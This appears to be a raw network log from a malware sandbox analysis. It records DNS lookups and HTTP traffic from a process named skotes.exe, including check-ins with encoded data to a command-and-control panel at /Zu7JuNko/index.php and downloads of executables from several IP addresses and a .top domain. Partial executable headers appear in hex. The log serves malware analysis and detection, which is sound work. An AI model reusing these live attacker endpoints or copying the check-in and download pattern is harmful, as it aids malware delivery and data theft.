                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.524282932 CET1.1.1.1192.168.2.40x17c1No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.524282932 CET1.1.1.1192.168.2.40x17c1No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.524282932 CET1.1.1.1192.168.2.40x17c1No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.524772882 CET1.1.1.1192.168.2.40xe67No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.766463995 CET1.1.1.1192.168.2.40x5e3eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.766463995 CET1.1.1.1192.168.2.40x5e3eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.766463995 CET1.1.1.1192.168.2.40x5e3eNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.766463995 CET1.1.1.1192.168.2.40x5e3eNo error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.766479969 CET1.1.1.1192.168.2.40x2ee0No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.766479969 CET1.1.1.1192.168.2.40x2ee0No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:05.054366112 CET1.1.1.1192.168.2.40x5650No error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:05.054366112 CET1.1.1.1192.168.2.40x5650No error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:13.677073002 CET1.1.1.1192.168.2.40x624eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:13.689594984 CET1.1.1.1192.168.2.40x2a77No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            0192.168.2.449758185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.037514925 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.460634947 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:07 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            1192.168.2.449764185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.097398996 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.489499092 CET644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:10 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 31 63 35 0d 0a 20 3c 63 3e 31 30 30 37 39 31 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 37 39 31 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 37 39 31 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 37 39 31 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: 1c5 <c>1007913001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1007914001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1007915001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1007916001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1007917001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            2192.168.2.44977031.41.244.11802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.617958069 CET54OUTGET /files/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045788050 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 4406272
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:52:35 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f10f3-433c00"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 50 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 c5 00 00 04 00 00 dc db 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 39 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 39 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g(Is2PJ@C@ _qsp9 9 px'@.rsrc p'@.idata q'@ 8q'@odbfcxsw'@fprwnwoi@C@.taggant0P"C@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045880079 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045912981 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045948982 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046076059 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046113968 CET672INData Raw: 3d 2f be 99 ec 68 34 67 84 a2 de 4d ef 9a 99 4a 01 04 c6 7a 44 3e 40 c5 3a 67 5f 5e 19 22 88 85 4f 9a d6 dd a6 fb b8 b1 b0 f3 27 26 a4 5d af 4c 3e ad 47 82 99 e6 04 8c 57 aa 2f eb 19 fe 07 94 fc c1 75 72 a9 91 c7 3c bf 45 b6 87 65 00 bf 04 2a a7
                                                                                                                                                                                                                                                                                                            Data Ascii: =/h4gMJzD>@:g_^"O'&]L>GW/ur<Ee*?LuY_1k\%E gM$-)77F1pa{<dX>CM"}$@o'WVmwlk=&-eNyzO
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046163082 CET1236INData Raw: c4 10 2d 8d 4f e3 6f 09 10 38 44 73 54 e0 48 e6 c8 61 15 8c 50 d4 16 2b 40 fd 01 a2 40 d0 64 0d 86 7d 32 65 8f d6 82 18 87 ad d8 cf 2d aa 32 a9 ba 5a 37 c6 6f 31 ff df d5 82 04 ee 01 2d a3 93 29 7b 92 bb 22 a0 1c b4 a3 da 54 f7 e5 00 b7 da a9 c1
                                                                                                                                                                                                                                                                                                            Data Ascii: -Oo8DsTHaP+@@d}2e-2Z7o1-){"T.GUUQW!27GC=h8uYD+p|.w)x-*7MEaD&C;T=5x*8PE@_#lBm2$yH~
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046216965 CET1236INData Raw: a6 2d 09 85 72 76 b5 84 b4 c1 8b 1a 80 5c 7c 26 c5 f1 7f 8f 4f ed c3 7b c6 24 00 b9 cc ca 78 26 80 e8 2e c5 ce 3a c2 36 9d a9 6f 09 94 dd 75 71 d3 c3 38 37 fd 52 20 7d a9 dd 00 aa 8b f2 58 1d bf b9 f9 24 8e 0a 3c 4a 80 6d 58 61 eb e8 c5 6b d2 df
                                                                                                                                                                                                                                                                                                            Data Ascii: -rv\|&O{$x&.:6ouq87R }X$<JmXakH70Kz%CZh>OOHnI}@/*6*4oC>()]o,,fsT!ImePP!,$55:g$#G7Eqcq%IFhM6[
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046251059 CET448INData Raw: ad 91 d7 dc 98 e4 b8 ae d4 a2 dc 9b 81 a6 3a 85 d0 ef 2e ee e1 db 2e 7c c8 16 3c 87 22 ad d0 ac d1 8a 5f 3f ee 04 e7 46 ca 23 f4 cb 77 18 2f b9 0f 0f 30 61 0c 12 f1 ba 94 31 97 c3 f1 9d 3b 49 f5 f1 29 c4 07 4f d7 6c 01 85 57 fd 58 9b ea ef 62 0b
                                                                                                                                                                                                                                                                                                            Data Ascii: :..|<"_?F#w/0a1;I)OlWXbar5xQQLDsb's'UP8z0O<H[M^U2s6k)%jORaZIF;Zwa]/*e64kG99*pO
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046288013 CET1236INData Raw: d6 5a 58 b4 e1 73 59 77 22 f9 c5 32 58 bb b8 5b 62 11 5e dc 81 07 09 cf 9c ad 70 f6 a5 26 cd 3a 46 f0 ad 86 cd d4 88 7f c8 cd 85 5d 19 b3 b3 b9 03 6e f3 c8 05 75 70 76 d2 b9 48 48 9e f9 7f 9a a8 d6 4b bd 9d 20 53 f9 cb c2 cd e6 81 e4 9e 6f 27 81
                                                                                                                                                                                                                                                                                                            Data Ascii: ZXsYw"2X[b^p&:F]nupvHHK So'CvfYvK@vcYr ?jsWiAHMQkQ;WtHW6@/rG{FIJ>^LgL%c$CQ<cNd@0BCbhp/=
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.165764093 CET1236INData Raw: 1e f9 b2 b8 22 77 24 a6 a5 c3 17 44 b6 35 55 10 76 1c 4c 5e 9d da 33 8e 50 a1 30 8c e6 e7 b4 cb ce 7b 25 bd 09 ac 60 1a 66 69 c4 c9 01 4a cb b3 4c d5 87 99 92 d8 44 9d a8 32 34 b7 8c b1 30 89 94 ca c3 d3 86 b6 27 b1 d5 3b 42 b4 c8 d9 27 bb 9c 32
                                                                                                                                                                                                                                                                                                            Data Ascii: "w$D5UvL^3P0{%`fiJLD240';B'2*[-\_K4J0C[$,w0T<X9TTe)|HLN.X&a~_8B7a!Nt4g<IT@``joTY_[%*Q\4`^OC$


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            3192.168.2.449796185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.162122965 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 65 31 3d 31 30 30 37 39 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                                            Data Ascii: e1=1007913001&unit=246122658369
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.568960905 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:23 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            4192.168.2.449802185.215.113.16802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.700779915 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.077708006 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:24 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 1925632
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:53:57 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f1145-1d6200"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 be 00 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 1d aa 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 60 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELr;g@L@pL@\pp`q P^@.rsrc`n@.idata pp@ +r@waxfszwi`1t@civszaqm0L<@.taggant0@L"@@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.077775002 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078355074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078490973 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078521013 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079674959 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079730988 CET1236INData Raw: 6f 60 49 e7 19 1e 1e 43 6a 16 99 6c b6 a5 dc 57 7f 4a ca 8d 99 48 24 3a c1 a9 cb 07 36 4d d5 e1 eb c2 98 1d 09 da 8b e3 21 dd d0 73 46 fc 9a c1 38 4c 2e 2e 8f 95 c8 07 1d c7 3e c3 c5 a8 a1 ab 5e 46 80 be 32 a4 b0 58 fd 91 ad 1c 33 48 88 34 02 9d
                                                                                                                                                                                                                                                                                                            Data Ascii: o`ICjlWJH$:6M!sF8L..>^F2X3H4JG~tFOr!rJ\!imMW<N8rV9t* Mbt "T;[/MoW`rshIQgxG360t]=y#_!+J)XHz
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079761028 CET248INData Raw: d9 1b 43 2c f5 52 04 57 e2 f4 0b a9 86 ec f1 36 14 1e 08 fb 7c f0 47 6c 06 80 07 68 02 ff 07 32 fa 61 eb 59 2d 89 38 32 18 d0 32 d2 fa fe e7 27 8c 7d 15 2a 68 c8 8c c2 4c c7 03 20 67 81 6b 46 05 1b 28 47 01 97 90 06 af 18 fb a6 87 73 b2 3a e5 05
                                                                                                                                                                                                                                                                                                            Data Ascii: C,RW6|Glh2aY-822'}*hL gkF(Gs:(Gl_"Bg~1>?aA>h>&HFR_u-unP=hr*(67FU*!25Sr=*,V0ko_2COHQ',f{
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.080142975 CET1236INData Raw: 1b 31 8c 63 cb 22 65 ac a0 c2 67 0d a1 4c 76 65 20 8e 19 60 1b e0 80 32 28 c4 4a cf 6a f2 bd 84 ae ec 18 80 45 53 0b c5 df b1 a4 07 c3 d4 b0 da 2a 36 89 66 a7 35 20 ce f6 d0 a8 b5 17 fc a4 a3 a1 69 04 ff 36 e7 28 fa af 3c cd 8b ed bd 89 f9 13 9d
                                                                                                                                                                                                                                                                                                            Data Ascii: 1c"egLve `2(JjES*6f5 i6(<%\T2'ar"+<?T0+3{B~V%7)2("&Z^I}X|[F``B)<"6>7_B0lF+nrjk?@g"VvW~
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.080234051 CET1236INData Raw: 8e 58 60 15 b7 fd d7 53 cf ab 1a 9e a5 df a5 01 82 58 82 42 fd 65 fe e2 c5 69 0c 69 d5 47 1f 27 15 cc 90 13 7f e2 93 e3 1e 18 07 d9 ed 00 d0 1b 84 1e 08 82 79 8a 39 fc 68 7e ac d9 8f 07 80 e4 1f b6 0f a5 31 7a aa c8 e4 9b 3d 00 a6 c2 e4 41 f0 c6
                                                                                                                                                                                                                                                                                                            Data Ascii: X`SXBeiiG'y9h~1z=AJb?~NLN`Orj!63xr]dT-kLg<.2U!Z.H*O`+HI"Q|0-%v4f&9w<4>ze$<?'35qPd
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.197590113 CET1236INData Raw: c7 99 c2 c8 86 07 4e 35 12 15 cd 7f 19 02 a9 bf 4a 70 68 b5 0a b6 29 09 8f e4 1b 0d 40 31 00 06 0f b8 38 e9 3a 5e e4 67 0b cf eb 32 02 6c 50 13 20 b9 4f 70 3e 90 c1 97 02 5d fb 8e 57 60 82 8e b1 1f b8 6a 46 94 f7 2b 8f 86 10 97 ee de a8 66 3c 9f
                                                                                                                                                                                                                                                                                                            Data Ascii: N5Jph)@18:^g2lP Op>]W`jF+f<e>M5oHz@zB4?B%<B*D!(IL&(M+"$MGo6D_$k?[181sdaLm"Y9.2d^SVsa.i),uT3


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            5192.168.2.44980334.116.198.130807256C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.996134043 CET87OUTGET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: home.fvtekk5pn.top
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.422795057 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            server: nginx/1.22.1
                                                                                                                                                                                                                                                                                                            date: Thu, 21 Nov 2024 11:10:25 GMT
                                                                                                                                                                                                                                                                                                            content-type: application/octet-stream
                                                                                                                                                                                                                                                                                                            content-length: 10815536
